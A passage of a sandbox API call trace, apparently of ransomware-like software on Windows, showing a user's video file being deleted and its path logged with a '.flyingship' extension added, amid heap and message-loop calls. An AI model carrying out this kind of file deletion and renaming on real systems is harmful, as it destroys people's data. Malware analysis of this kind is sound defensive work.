lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", lpFilePart=0x0) returned 0x46 [0199.549] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92ed7c0, ftCreationTime.dwHighDateTime=0x1d5de34, ftLastAccessTime.dwLowDateTime=0xb5fc0d50, ftLastAccessTime.dwHighDateTime=0x1d5e5ba, ftLastWriteTime.dwLowDateTime=0x1bd5d780, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb336, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="IoPtJD0U8Gbyjv6.swf", cAlternateFileName="IOPTJD~1.SWF")) returned 0x90ae18 [0199.549] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\ioptjd0u8gbyjv6.swf")) returned 1 [0199.551] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92ed7c0, ftCreationTime.dwHighDateTime=0x1d5de34, ftLastAccessTime.dwLowDateTime=0xb5fc0d50, ftLastAccessTime.dwHighDateTime=0x1d5e5ba, ftLastWriteTime.dwLowDateTime=0x1bd5d780, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb336, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="IoPtJD0U8Gbyjv6.swf", cAlternateFileName="IOPTJD~1.SWF")) returned 0 [0199.551] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.554] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.554] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.554] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0199.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.554] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.555] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.555] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.555] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.555] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.556] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.556] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0199.556] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.556] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.557] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0199.557] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3f2b, lpOverlapped=0x0) returned 1 [0199.558] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0199.558] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3f2b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.558] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0199.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.flyingship.swf\r\n", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0199.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x54) returned 0x8c4a48 [0199.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.flyingship.swf\r\n", cchWideChar=84, lpMultiByteStr=0x8c4a48, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.flyingship.swf\r\n", lpUsedDefaultChar=0x0) returned 84 [0199.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0199.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0199.558] WriteFile (in: hFile=0x160, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x53, lpOverlapped=0x0) returned 1 [0199.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0199.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.558] CloseHandle (hObject=0x160) returned 1 [0199.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0199.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907340 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0199.560] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0199.560] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.561] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0199.561] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.561] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0199.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0199.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.561] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0199.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0199.562] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0199.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0199.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0199.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.564] HeapFree (in: 